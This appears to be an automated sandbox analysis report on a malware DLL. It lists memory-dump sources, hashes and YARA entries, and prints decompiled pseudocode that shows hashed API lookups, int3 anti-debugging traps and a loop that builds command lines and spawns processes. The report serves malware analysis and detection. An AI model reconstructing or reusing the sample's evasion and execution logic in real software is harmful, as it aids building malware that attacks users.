                                                                                                                                0x027925d8
                                                                                                                                0x02792532
                                                                                                                                0x02792538
                                                                                                                                0x02792538
                                                                                                                                0x02792614
                                                                                                                                0x02792659
                                                                                                                                0x0279251f
                                                                                                                                0x00000000
                                                                                                                                0x0279251f

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.326055184.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID: t
                                                                                                                                • API String ID: 544645111-2238339752
                                                                                                                                • Opcode ID: 7b367a2c4835c9cf8c3a3e54496d53c6235d3fc818baa1e1d4a5ce7ba97e5e77
                                                                                                                                • Instruction ID: f80810328b5533d715e0823e3d2e11be974123721d6864e9ed30741532305d09
                                                                                                                                • Opcode Fuzzy Hash: 7b367a2c4835c9cf8c3a3e54496d53c6235d3fc818baa1e1d4a5ce7ba97e5e77
                                                                                                                                • Instruction Fuzzy Hash: 05B1ACB4D04328DFDB14DF68C890A9DBBF1BF48304F1585AAE948AB352D731A981CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.326055184.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: true
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 033d263155ffc3d0b6236b8629689c658cf4e2d9a96ebed7f8aabdbc96411034
                                                                                                                                • Instruction ID: 392f3200cbb7f5e2c8e09aed0dd05aa9389de40e70c3cbaa7ce3c0ff00005969
                                                                                                                                • Opcode Fuzzy Hash: 033d263155ffc3d0b6236b8629689c658cf4e2d9a96ebed7f8aabdbc96411034
                                                                                                                                • Instruction Fuzzy Hash: C641E0B5D0131A9FDB08DFA8D894AAEBBF1FF48314F148529E848AB340D335A841CF84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E10006D50() {
                                                                                                                                
                                                                                                                                				 *0x1001d280 = GetUserNameW;
                                                                                                                                				 *0x1001D284 = MessageBoxW;
                                                                                                                                				 *0x1001D288 = GetLastError;
                                                                                                                                				 *0x1001D28C = CreateFileA;
                                                                                                                                				 *0x1001D290 = DebugBreak;
                                                                                                                                				 *0x1001D294 = FlushFileBuffers;
                                                                                                                                				 *0x1001D298 = FreeEnvironmentStringsA;
                                                                                                                                				 *0x1001D29C = GetConsoleOutputCP;
                                                                                                                                				 *0x1001D2A0 = GetEnvironmentStrings;
                                                                                                                                				 *0x1001D2A4 = GetLocaleInfoA;
                                                                                                                                				 *0x1001D2A8 = GetStartupInfoA;
                                                                                                                                				 *0x1001D2AC = GetStringTypeA;
                                                                                                                                				 *0x1001D2B0 = HeapValidate;
                                                                                                                                				 *0x1001D2B4 = IsBadReadPtr;
                                                                                                                                				 *0x1001D2B8 = LCMapStringA;
                                                                                                                                				 *0x1001D2BC = LoadLibraryA;
                                                                                                                                				 *0x1001D2C0 = OutputDebugStringA;
                                                                                                                                				return 0x1001d280;
                                                                                                                                			}



                                                                                                                                0x10006d61
                                                                                                                                0x10006d69
                                                                                                                                0x10006d6c
                                                                                                                                0x10006d7b
                                                                                                                                0x10006d7e
                                                                                                                                0x10006d8d
                                                                                                                                0x10006d90
                                                                                                                                0x10006d9f
                                                                                                                                0x10006da2
                                                                                                                                0x10006db1
                                                                                                                                0x10006db4
                                                                                                                                0x10006dc3
                                                                                                                                0x10006dc6
                                                                                                                                0x10006dd5
                                                                                                                                0x10006dd8
                                                                                                                                0x10006de7
                                                                                                                                0x10006dea
                                                                                                                                0x10006ded

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.326422259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.326385968.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326450075.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326459410.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326469799.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
                                                                                                                                • Instruction ID: 9a9f90be372116ce35b3bf57ca6adafecb814b37ff7dc50591bd4b03753dcc6b
                                                                                                                                • Opcode Fuzzy Hash: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
                                                                                                                                • Instruction Fuzzy Hash: 99110FB8A05620CFD34ACF09D5D49117BF2BB8E360312C19AD8098B376D734D985CF54
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 71%
                                                                                                                                			E10002523() {
                                                                                                                                				signed int _t126;
                                                                                                                                				intOrPtr _t128;
                                                                                                                                				intOrPtr* _t129;
                                                                                                                                				signed int _t137;
                                                                                                                                				intOrPtr _t145;
                                                                                                                                				signed int _t151;
                                                                                                                                				intOrPtr* _t154;
                                                                                                                                				intOrPtr _t157;
                                                                                                                                				intOrPtr _t161;
                                                                                                                                				intOrPtr _t170;
                                                                                                                                				signed int _t175;
                                                                                                                                				void* _t188;
                                                                                                                                				void* _t189;
                                                                                                                                				void* _t190;
                                                                                                                                				void* _t192;
                                                                                                                                				void* _t193;
                                                                                                                                				void* _t194;
                                                                                                                                				signed int _t202;
                                                                                                                                				void* _t220;
                                                                                                                                				unsigned int _t222;
                                                                                                                                				signed int _t226;
                                                                                                                                				intOrPtr _t229;
                                                                                                                                				unsigned int _t234;
                                                                                                                                				intOrPtr* _t244;
                                                                                                                                				signed int _t245;
                                                                                                                                				intOrPtr* _t246;
                                                                                                                                				void* _t249;
                                                                                                                                				void* _t250;
                                                                                                                                				void* _t251;
                                                                                                                                				void* _t252;
                                                                                                                                				intOrPtr* _t256;
                                                                                                                                				intOrPtr* _t285;
                                                                                                                                				void* _t327;
                                                                                                                                				intOrPtr* _t328;
                                                                                                                                				intOrPtr* _t330;
                                                                                                                                				void* _t333;
                                                                                                                                				signed int _t341;
                                                                                                                                				intOrPtr _t344;
                                                                                                                                				void* _t346;
                                                                                                                                				void* _t348;
                                                                                                                                				signed int _t356;
                                                                                                                                				void* _t357;
                                                                                                                                				intOrPtr* _t358;
                                                                                                                                				intOrPtr* _t359;
                                                                                                                                				unsigned int _t375;
                                                                                                                                
                                                                                                                                				_push(0x64);
                                                                                                                                				_push(0x28);
                                                                                                                                				_t327 = 3;
                                                                                                                                				E1000DD28(_t359 + 0x9c, _t327);
                                                                                                                                				_t249 = 2;
                                                                                                                                				if(E100057DC(_t249) > 1 && E1001303C(0x10154545, 0xa52c28b3) != 0) {
                                                                                                                                					_push( *((intOrPtr*)(_t359 + 0x94)));
                                                                                                                                					asm("int3");
                                                                                                                                					asm("int3");
                                                                                                                                				}
                                                                                                                                				_t250 = 2;
                                                                                                                                				if(E100057DC(_t250) > 1 && E1001303C(0x10154545, 0xa52c28b3) != 0) {
                                                                                                                                					_push( *((intOrPtr*)(_t359 + 0x94)));
                                                                                                                                					asm("int3");
                                                                                                                                					asm("int3");
                                                                                                                                				}
                                                                                                                                				_t251 = 2;
                                                                                                                                				if(E100057DC(_t251) > 1 && E1001303C(0x10154545, 0xa52c28b3) != 0) {
                                                                                                                                					_push( *((intOrPtr*)(_t359 + 0x94)));
                                                                                                                                					asm("int3");
                                                                                                                                					asm("int3");
                                                                                                                                				}
                                                                                                                                				_t252 = 2;
                                                                                                                                				if(E100057DC(_t252) > 1 && E1001303C(0x10154545, 0xa52c28b3) != 0) {
                                                                                                                                					_push( *((intOrPtr*)(_t359 + 0x94)));
                                                                                                                                					asm("int3");
                                                                                                                                					asm("int3");
                                                                                                                                				}
                                                                                                                                				_t253 = _t359 + 0x94;
                                                                                                                                				E1000D020(_t359 + 0x94);
                                                                                                                                				E10005844(_t253);
                                                                                                                                				 *((intOrPtr*)(_t359 + 0x148)) = 0x2800;
                                                                                                                                				E1000F5A8(_t359 + 0xf0, 0x2800);
                                                                                                                                				_t244 = E1000F4E0(_t359 + 0xf0, 0);
                                                                                                                                				_t328 = E1001303C(0xae765263, 0x485763a7);
                                                                                                                                				if(_t328 != 0) {
                                                                                                                                					 *_t328(_t244, _t359 + 0x148);
                                                                                                                                				}
                                                                                                                                				while(_t244 != 0) {
                                                                                                                                					_t256 = _t244 + 0x194;
                                                                                                                                					__eflags =  *_t256 - 0x4b005452 | ( *(_t256 + 4) & 0x0000ffff) - 0x000031a1;
                                                                                                                                					if(( *_t256 - 0x4b005452 | ( *(_t256 + 4) & 0x0000ffff) - 0x000031a1) == 0) {
                                                                                                                                						L100024D4();
                                                                                                                                					}
                                                                                                                                					_t244 =  *_t244;
                                                                                                                                				}
                                                                                                                                				E1000F678(_t359 + 0xec);
                                                                                                                                				E1000CFC8(_t359 + 0x80, 0);
                                                                                                                                				 *0x1001d1c8 = _t359 + 0x88;
                                                                                                                                				_t126 = E1001303C(0x10154545, 0xa341ded3);
                                                                                                                                				if(_t126 == 0) {
                                                                                                                                					_t245 = 0;
                                                                                                                                					__eflags = 0;
                                                                                                                                				} else {
                                                                                                                                					asm("int3");
                                                                                                                                					asm("int3");
                                                                                                                                					_t245 = _t126;
                                                                                                                                				}
                                                                                                                                				_t128 = E1001303C(0xb252609f, 0xe493518);
                                                                                                                                				if(_t128 == 0) {
                                                                                                                                					_t246 = 0x1001d1d0;
                                                                                                                                					 *0x1001d1d0 = 0;
                                                                                                                                				} else {
                                                                                                                                					_push(0x1001d1cc);
                                                                                                                                					_push(_t245);
                                                                                                                                					asm("int3");
                                                                                                                                					asm("int3");
                                                                                                                                					_t246 = 0x1001d1d0;
                                                                                                                                					 *0x1001d1d0 = _t128;
                                                                                                                                				}
                                                                                                                                				_t129 = E10010754(0);
                                                                                                                                				 *_t359 = _t129;
                                                                                                                                				if( *_t129 < 0x10) {
                                                                                                                                					L100024D4();
                                                                                                                                				}
                                                                                                                                				E1000CFC8(_t359 + 0x6c, 0x200);
                                                                                                                                				_t330 = E1001303C(0x10154545, 0x869898b6);
                                                                                                                                				if(_t330 != 0) {
                                                                                                                                					_t234 =  *(_t359 + 0x6c) >> 1;
                                                                                                                                					_t375 = _t234;
                                                                                                                                					 *_t330(0,  *(_t359 + 0x6c), _t234);
                                                                                                                                				}
                                                                                                                                				E10011310(_t359 + 0xc4, _t346, _t375);
                                                                                                                                				if(E1000D130(_t359 + 0x6c,  *((intOrPtr*)(_t359 + 0xc4))) == 0) {
                                                                                                                                					E1001127C(_t359 + 0xfc, _t346, __eflags);
                                                                                                                                					__eflags = E1000D130(_t359 + 0x6c,  *((intOrPtr*)(_t359 + 0xfc)));
                                                                                                                                					if(__eflags == 0) {
                                                                                                                                						E10005968(_t359 + 0x70, __eflags);
                                                                                                                                						_t137 = E1000D130(_t359 + 0x6c,  *((intOrPtr*)(_t359 + 0x70)));
                                                                                                                                						__eflags = _t137;
                                                                                                                                						_t32 = _t137 != 0;
                                                                                                                                						__eflags = _t32;
                                                                                                                                						 *(_t359 + 0x70 - 0x6c) = 0 | _t32;
                                                                                                                                						E1000D020(_t359 + 0x70);
                                                                                                                                					} else {
                                                                                                                                						 *(_t359 + 4) = 1;
                                                                                                                                					}
                                                                                                                                					E1000D020(_t359 + 0xfc);
                                                                                                                                					E1000D020(_t359 + 0xc4);
                                                                                                                                					__eflags =  *(_t359 + 4);
                                                                                                                                					if( *(_t359 + 4) != 0) {
                                                                                                                                						goto L36;
                                                                                                                                					} else {
                                                                                                                                						 *(_t359 + 4) = 0;
                                                                                                                                						goto L37;
                                                                                                                                					}
                                                                                                                                				} else {
                                                                                                                                					E1000D020(_t359 + 0xc4);
                                                                                                                                					L36:
                                                                                                                                					 *(_t359 + 4) = 1;
                                                                                                                                					L37:
                                                                                                                                					_t333 = 2;
                                                                                                                                					E100078E4(_t359 + 0x70, _t333);
                                                                                                                                					E1000DA68(_t359 + 0x88 - 0x18, _t359 + 0x88, 0x7e);
                                                                                                                                					E1000D020(_t359 + 0x70);
                                                                                                                                					if( *((intOrPtr*)(_t359 + 0x88)) <= 0) {
                                                                                                                                						L46:
                                                                                                                                						_t145 =  *_t359;
                                                                                                                                						__eflags =  *((intOrPtr*)(_t145 + 0x2c)) - 2;
                                                                                                                                						if( *((intOrPtr*)(_t145 + 0x2c)) == 2) {
                                                                                                                                							L87:
                                                                                                                                							L1000F060(_t359 + 0x88);
                                                                                                                                							E1000D020(_t359 + 0x68);
                                                                                                                                							E1000D020(_t359 + 0x80);
                                                                                                                                							E1001311C(_t359 + 0xc0);
                                                                                                                                							__eflags = 0;
                                                                                                                                							return 0;
                                                                                                                                						}
                                                                                                                                						_t151 =  *0x1001d2c4; // 0x0
                                                                                                                                						__eflags = _t151;
                                                                                                                                						if(_t151 != 0) {
                                                                                                                                							_t226 =  *0x1001d028; // 0x0
                                                                                                                                							__eflags = _t226;
                                                                                                                                							if(_t226 == 0) {
                                                                                                                                								E100059D8();
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                						__eflags =  *0x1001d1cc - 2;
                                                                                                                                						if( *0x1001d1cc > 2) {
                                                                                                                                							E1000D03C(_t359 + 0x84,  *((intOrPtr*)( *_t246 + 8)));
                                                                                                                                						}
                                                                                                                                						E1000CFC8(_t359 + 0x74, 0);
                                                                                                                                						_t154 = E1000D0D8(_t359 + 0x78, 0x1001aeac,  *((intOrPtr*)( *_t359 + 0x2c)));
                                                                                                                                						_t359 = _t359 + 0xc;
                                                                                                                                						_push(0);
                                                                                                                                						_push( *_t154);
                                                                                                                                						E1000F0A0(_t359 + 0x88);
                                                                                                                                						E1000D020(_t359 + 0x70);
                                                                                                                                						_t157 =  *0x1001d02a; // 0x1
                                                                                                                                						__eflags = _t157 - 2;
                                                                                                                                						if(_t157 == 2) {
                                                                                                                                							L75:
                                                                                                                                							E10005F04();
                                                                                                                                							E10003214();
                                                                                                                                							_t161 =  *((intOrPtr*)( *_t359 + 0x2c));
                                                                                                                                							__eflags = _t161 - 3;
                                                                                                                                							if(_t161 == 3) {
                                                                                                                                								E10005FA4();
                                                                                                                                								goto L87;
                                                                                                                                							}
                                                                                                                                							__eflags = _t161 - 5;
                                                                                                                                							if(_t161 == 5) {
                                                                                                                                								__eflags =  *(_t359 + 4);
                                                                                                                                								if( *(_t359 + 4) != 0) {
                                                                                                                                									goto L87;
                                                                                                                                								}
                                                                                                                                								__eflags =  *0x1001d1cc - 1;
                                                                                                                                								if( *0x1001d1cc <= 1) {
                                                                                                                                									L82:
                                                                                                                                									E10016708(_t359 + 0x14, 0);
                                                                                                                                									E10012A18(_t359 + 0x10, __eflags);
                                                                                                                                									__eflags =  *0x1001d029 & 0x000000ff;
                                                                                                                                									E10002C64(_t359 + 0x10, 0 | ( *0x1001d029 & 0x000000ff) == 0x00000000);
                                                                                                                                									__eflags =  *0x1001d029;
                                                                                                                                									if(__eflags != 0) {
                                                                                                                                										E10005798(_t359 + 0x10);
                                                                                                                                									}
                                                                                                                                									_t285 = _t359 + 0x10;
                                                                                                                                									L85:
                                                                                                                                									E10016850(_t285, _t346, __eflags);
                                                                                                                                									goto L87;
                                                                                                                                								}
                                                                                                                                								_t170 =  *_t246;
                                                                                                                                								__eflags = ( *( *(_t170 + 4)) & 0x0000ffff) - 0x2d;
                                                                                                                                								if(( *( *(_t170 + 4)) & 0x0000ffff) == 0x2d) {
                                                                                                                                									goto L87;
                                                                                                                                								}
                                                                                                                                								goto L82;
                                                                                                                                							}
                                                                                                                                							__eflags = _t161 - 6;
                                                                                                                                							if(_t161 != 6) {
                                                                                                                                								goto L87;
                                                                                                                                							}
                                                                                                                                							E10016708(_t359 + 4, 0);
                                                                                                                                							E10012A18(_t359, __eflags);
                                                                                                                                							E10002C64(_t359, 0);
                                                                                                                                							E10005798(_t359);
                                                                                                                                							_t285 = _t359;
                                                                                                                                							goto L85;
                                                                                                                                						} else {
                                                                                                                                							_t175 =  *0x1001d027; // 0x0
                                                                                                                                							__eflags = _t175;
                                                                                                                                							if(_t175 == 0) {
                                                                                                                                								goto L75;
                                                                                                                                							}
                                                                                                                                							__eflags =  *(_t359 + 4);
                                                                                                                                							if( *(_t359 + 4) != 0) {
                                                                                                                                								goto L75;
                                                                                                                                							}
                                                                                                                                							__eflags =  *((char*)( *_t359 + 0xb)) - 0x20;
                                                                                                                                							_t340 =  ==  ? 0x3dae599e : 0xbfc83f2a;
                                                                                                                                							E10005ABC(_t359 + 0xb8,  ==  ? 0x3dae599e : 0xbfc83f2a,  *((char*)( *_t359 + 0xb)) - 0x20);
                                                                                                                                							E1000CFC8(_t359 + 0xa0, 0x200);
                                                                                                                                							_t356 = E1001303C(0x10154545, 0x869898b6);
                                                                                                                                							__eflags = _t356;
                                                                                                                                							if(__eflags != 0) {
                                                                                                                                								_t220 = E10011D54();
                                                                                                                                								_t222 =  *(_t359 + 0xa0) >> 1;
                                                                                                                                								__eflags = _t222;
                                                                                                                                								 *_t356(_t220,  *(_t359 + 0xa0), _t222, 0x94e21d79);
                                                                                                                                							}
                                                                                                                                							_push(0x80);
                                                                                                                                							_push(0);
                                                                                                                                							E10015CAC(_t359 + 0xb4, __eflags,  *((intOrPtr*)(_t359 + 0xa8)), 1);
                                                                                                                                							E10015CE0(_t359 + 0xdc - 0x38, __eflags, _t359 + 0xdc, 0);
                                                                                                                                							__eflags =  *((char*)(_t359 + 0xb4));
                                                                                                                                							if( *((char*)(_t359 + 0xb4)) != 0) {
                                                                                                                                								E1000BB88(_t359 + 0xb0);
                                                                                                                                							}
                                                                                                                                							E1000D020(_t359 + 0xa4);
                                                                                                                                							_t348 = _t359 + 0x104;
                                                                                                                                							_t357 = _t348 - 0x38;
                                                                                                                                							while(1) {
                                                                                                                                								E10013670(_t348, 0, "jDj");
                                                                                                                                								 *((intOrPtr*)(_t359 + 0x110)) = 0x44;
                                                                                                                                								E10013670(_t357, 0, 0x10);
                                                                                                                                								_t359 = _t359 + 0x18;
                                                                                                                                								E1000CFC8(_t359 + 0x7c, 0);
                                                                                                                                								_push(0);
                                                                                                                                								_push( *((intOrPtr*)(_t359 + 0xbc)));
                                                                                                                                								_t188 = E1000F0A0(_t359 + 0x80);
                                                                                                                                								_push(0x20);
                                                                                                                                								_t189 = E1000DF20(_t188);
                                                                                                                                								_push(0x22);
                                                                                                                                								_t190 = E1000DF20(_t189);
                                                                                                                                								_push(0);
                                                                                                                                								_push( *((intOrPtr*)( *_t246)));
                                                                                                                                								_t192 = E1000F0A0(_t190);
                                                                                                                                								_push(0x22);
                                                                                                                                								_t193 = E1000DF20(_t192);
                                                                                                                                								_push(0x20);
                                                                                                                                								_t194 = E1000DF20(_t193);
                                                                                                                                								_push(0);
                                                                                                                                								_push( *((intOrPtr*)(_t359 + 0x84)));
                                                                                                                                								E1000F0A0(_t194);
                                                                                                                                								_t341 = E1001303C(0x10154545, 0x2676b600);
                                                                                                                                								__eflags = _t341;
                                                                                                                                								if(_t341 == 0) {
                                                                                                                                									goto L68;
                                                                                                                                								}
                                                                                                                                								 *_t341( *((intOrPtr*)(_t359 + 0xdc)),  *((intOrPtr*)(_t359 + 0x98)), 0, 0, 0, 4, 0, 0, _t348, _t357);
                                                                                                                                								__eflags = 0;
                                                                                                                                								if(0 == 0) {
                                                                                                                                									__eflags = E100135C8(_t348);
                                                                                                                                									if(__eflags != 0) {
                                                                                                                                										goto L68;
                                                                                                                                									}
                                                                                                                                								}
                                                                                                                                								_push( *((intOrPtr*)(_t359 + 0xcc)));
                                                                                                                                								E1000FA9C(_t359 + 4, __eflags);
                                                                                                                                								_t202 = E1001303C(0xfe338407, 0x77fa1d17);
                                                                                                                                								__eflags = _t202;
                                                                                                                                								if(_t202 != 0) {
                                                                                                                                									_push( *((intOrPtr*)(_t359 + 0xd0)));
                                                                                                                                									asm("int3");
                                                                                                                                									asm("int3");
                                                                                                                                								}
                                                                                                                                								__eflags = E1000FB80(_t359) - 0x40;
                                                                                                                                								if(__eflags == 0) {
                                                                                                                                									L66:
                                                                                                                                									E1000FB20(_t359, __eflags);
                                                                                                                                									E1000F678(_t359 + 0x58);
                                                                                                                                									E1000DFDC(_t359 + 0x34);
                                                                                                                                									E1000D020(_t359 + 0x2c);
                                                                                                                                									 *_t359 = 0x1001ae9c;
                                                                                                                                									__eflags =  *((char*)(_t359 + 0x10));
                                                                                                                                									if( *((char*)(_t359 + 0x10)) != 0) {
                                                                                                                                										E1000BB88(_t359 + 0xc);
                                                                                                                                									}
                                                                                                                                								} else {
                                                                                                                                									__eflags = L10008CF4( *((intOrPtr*)(_t359 + 0xc)), __eflags);
                                                                                                                                									if(__eflags != 0) {
                                                                                                                                										__eflags = E10001000(_t359, _t359 + 0xdc, __eflags);
                                                                                                                                										if(__eflags == 0) {
                                                                                                                                											goto L66;
                                                                                                                                										}
                                                                                                                                										E1000F678(_t359 + 0x58);
                                                                                                                                										E1000DFDC(_t359 + 0x34);
                                                                                                                                										E1000D020(_t359 + 0x2c);
                                                                                                                                										 *_t359 = 0x1001ae9c;
                                                                                                                                										__eflags =  *((char*)(_t359 + 0x10));
                                                                                                                                										if( *((char*)(_t359 + 0x10)) != 0) {
                                                                                                                                											E1000BB88(_t359 + 0xc);
                                                                                                                                										}
                                                                                                                                										E1000D020(_t359 + 0x78);
                                                                                                                                										E1000F678(_t359 + 0xdc);
                                                                                                                                										E1000D020(_t359 + 0x9c);
                                                                                                                                										E1000D020(_t359 + 0xb8);
                                                                                                                                										goto L87;
                                                                                                                                									}
                                                                                                                                									goto L66;
                                                                                                                                								}
                                                                                                                                								L68:
                                                                                                                                								E1000D020(_t359 + 0x78);
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                					}
                                                                                                                                					while(1) {
                                                                                                                                						L39:
                                                                                                                                						_t358 = E1001303C(0x10154545, 0xb1e6d29b);
                                                                                                                                						if(_t358 != 0) {
                                                                                                                                							 *_t358( *((intOrPtr*)(E1000EC68(_t359 + 0x8c, _t346))));
                                                                                                                                						}
                                                                                                                                						_t344 =  *((intOrPtr*)(_t359 + 0x88));
                                                                                                                                						while(1) {
                                                                                                                                							L42:
                                                                                                                                							_t346 = 1;
                                                                                                                                							if(1 >= _t344) {
                                                                                                                                								goto L46;
                                                                                                                                							}
                                                                                                                                							if(1 != 4) {
                                                                                                                                								while(1) {
                                                                                                                                									L39:
                                                                                                                                									_t358 = E1001303C(0x10154545, 0xb1e6d29b);
                                                                                                                                									if(_t358 != 0) {
                                                                                                                                										 *_t358( *((intOrPtr*)(E1000EC68(_t359 + 0x8c, _t346))));
                                                                                                                                									}
                                                                                                                                									_t344 =  *((intOrPtr*)(_t359 + 0x88));
                                                                                                                                									goto L42;
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                							_t229 =  *0x1001d02a; // 0x1
                                                                                                                                							if(_t229 == 2) {
                                                                                                                                								continue;
                                                                                                                                							}
                                                                                                                                							goto L39;
                                                                                                                                						}
                                                                                                                                						goto L46;
                                                                                                                                					}
                                                                                                                                				}
                                                                                                                                			}
















































                                                                                                                                0x10002523
                                                                                                                                0x10002525
                                                                                                                                0x10002529
                                                                                                                                0x10002531
                                                                                                                                0x10002538
                                                                                                                                0x10002541
                                                                                                                                0x10002556
                                                                                                                                0x1000255d
                                                                                                                                0x1000255e
                                                                                                                                0x1000255e
                                                                                                                                0x10002561
                                                                                                                                0x1000256a
                                                                                                                                0x1000257f
                                                                                                                                0x10002586
                                                                                                                                0x10002587
                                                                                                                                0x10002587
                                                                                                                                0x1000258a
                                                                                                                                0x10002593
                                                                                                                                0x100025a8
                                                                                                                                0x100025af
                                                                                                                                0x100025b0
                                                                                                                                0x100025b0
                                                                                                                                0x100025b3
                                                                                                                                0x100025bc
                                                                                                                                0x100025d1
                                                                                                                                0x100025d8
                                                                                                                                0x100025d9
                                                                                                                                0x100025d9
                                                                                                                                0x100025da
                                                                                                                                0x100025e1
                                                                                                                                0x100025e6
                                                                                                                                0x100025f0
                                                                                                                                0x100025ff
                                                                                                                                0x10002612
                                                                                                                                0x10002623
                                                                                                                                0x10002627
                                                                                                                                0x10002632
                                                                                                                                0x10002632
                                                                                                                                0x1000265b
                                                                                                                                0x10002640
                                                                                                                                0x10002650
                                                                                                                                0x10002652
                                                                                                                                0x10002654
                                                                                                                                0x10002654
                                                                                                                                0x10002659
                                                                                                                                0x10002659
                                                                                                                                0x10002666
                                                                                                                                0x10002674
                                                                                                                                0x1000268a
                                                                                                                                0x1000268f
                                                                                                                                0x10002696
                                                                                                                                0x100026a0
                                                                                                                                0x100026a0
                                                                                                                                0x10002698
                                                                                                                                0x10002698
                                                                                                                                0x10002699
                                                                                                                                0x1000269a
                                                                                                                                0x1000269a
                                                                                                                                0x100026ac
                                                                                                                                0x100026b3
                                                                                                                                0x100026c6
                                                                                                                                0x100026cb
                                                                                                                                0x100026b5
                                                                                                                                0x100026b5
                                                                                                                                0x100026ba
                                                                                                                                0x100026bb
                                                                                                                                0x100026bc
                                                                                                                                0x100026bd
                                                                                                                                0x100026c2
                                                                                                                                0x100026c2
                                                                                                                                0x100026d3
                                                                                                                                0x100026d8
                                                                                                                                0x100026de
                                                                                                                                0x100026e0
                                                                                                                                0x100026e0
                                                                                                                                0x100026ee
                                                                                                                                0x10002702
                                                                                                                                0x10002706
                                                                                                                                0x1000270c
                                                                                                                                0x1000270c
                                                                                                                                0x10002715
                                                                                                                                0x10002715
                                                                                                                                0x1000271e
                                                                                                                                0x10002735
                                                                                                                                0x1000274c
                                                                                                                                0x10002761
                                                                                                                                0x10002763
                                                                                                                                0x10002773
                                                                                                                                0x10002780
                                                                                                                                0x10002787
                                                                                                                                0x1000278d
                                                                                                                                0x1000278d
                                                                                                                                0x10002790
                                                                                                                                0x10002793
                                                                                                                                0x10002765
                                                                                                                                0x10002765
                                                                                                                                0x10002765
                                                                                                                                0x1000279f
                                                                                                                                0x100027ab
                                                                                                                                0x100027b0
                                                                                                                                0x100027b5
                                                                                                                                0x00000000
                                                                                                                                0x100027b7
                                                                                                                                0x100027b7
                                                                                                                                0x00000000
                                                                                                                                0x100027b7
                                                                                                                                0x10002737
                                                                                                                                0x1000273e
                                                                                                                                0x100027be
                                                                                                                                0x100027be
                                                                                                                                0x100027c3
                                                                                                                                0x100027c5
                                                                                                                                0x100027ca
                                                                                                                                0x100027dc
                                                                                                                                0x100027e5
                                                                                                                                0x100027f2
                                                                                                                                0x10002838
                                                                                                                                0x10002838
                                                                                                                                0x1000283b
                                                                                                                                0x1000283f
                                                                                                                                0x10002c29
                                                                                                                                0x10002c30
                                                                                                                                0x10002c39
                                                                                                                                0x10002c45
                                                                                                                                0x10002c51
                                                                                                                                0x10002c56
                                                                                                                                0x10002c62
                                                                                                                                0x10002c62
                                                                                                                                0x10002845
                                                                                                                                0x1000284a
                                                                                                                                0x1000284c
                                                                                                                                0x1000284e
                                                                                                                                0x10002853
                                                                                                                                0x10002855
                                                                                                                                0x10002857
                                                                                                                                0x10002857
                                                                                                                                0x10002855
                                                                                                                                0x1000285c
                                                                                                                                0x10002863
                                                                                                                                0x10002871
                                                                                                                                0x10002871
                                                                                                                                0x1000287c
                                                                                                                                0x10002891
                                                                                                                                0x10002896
                                                                                                                                0x10002899
                                                                                                                                0x1000289b
                                                                                                                                0x100028a4
                                                                                                                                0x100028ad
                                                                                                                                0x100028b2
                                                                                                                                0x100028b7
                                                                                                                                0x100028b9
                                                                                                                                0x10002b6d
                                                                                                                                0x10002b6d
                                                                                                                                0x10002b72
                                                                                                                                0x10002b7a
                                                                                                                                0x10002b7d
                                                                                                                                0x10002b80
                                                                                                                                0x10002c24
                                                                                                                                0x00000000
                                                                                                                                0x10002c24
                                                                                                                                0x10002b86
                                                                                                                                0x10002b89
                                                                                                                                0x10002bc2
                                                                                                                                0x10002bc4
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10002bc6
                                                                                                                                0x10002bcd
                                                                                                                                0x10002bdc
                                                                                                                                0x10002be2
                                                                                                                                0x10002beb
                                                                                                                                0x10002bf9
                                                                                                                                0x10002c02
                                                                                                                                0x10002c0c
                                                                                                                                0x10002c0e
                                                                                                                                0x10002c14
                                                                                                                                0x10002c14
                                                                                                                                0x10002c19
                                                                                                                                0x10002c1d
                                                                                                                                0x10002c1d
                                                                                                                                0x00000000
                                                                                                                                0x10002c1d
                                                                                                                                0x10002bcf
                                                                                                                                0x10002bd7
                                                                                                                                0x10002bda
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10002bda
                                                                                                                                0x10002b8b
                                                                                                                                0x10002b8e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10002b9a
                                                                                                                                0x10002ba2
                                                                                                                                0x10002bac
                                                                                                                                0x10002bb4
                                                                                                                                0x10002bb9
                                                                                                                                0x00000000
                                                                                                                                0x100028bf
                                                                                                                                0x100028bf
                                                                                                                                0x100028c4
                                                                                                                                0x100028c6
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x100028d0
                                                                                                                                0x100028d2
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x100028ec
                                                                                                                                0x100028f0
                                                                                                                                0x100028f3
                                                                                                                                0x10002904
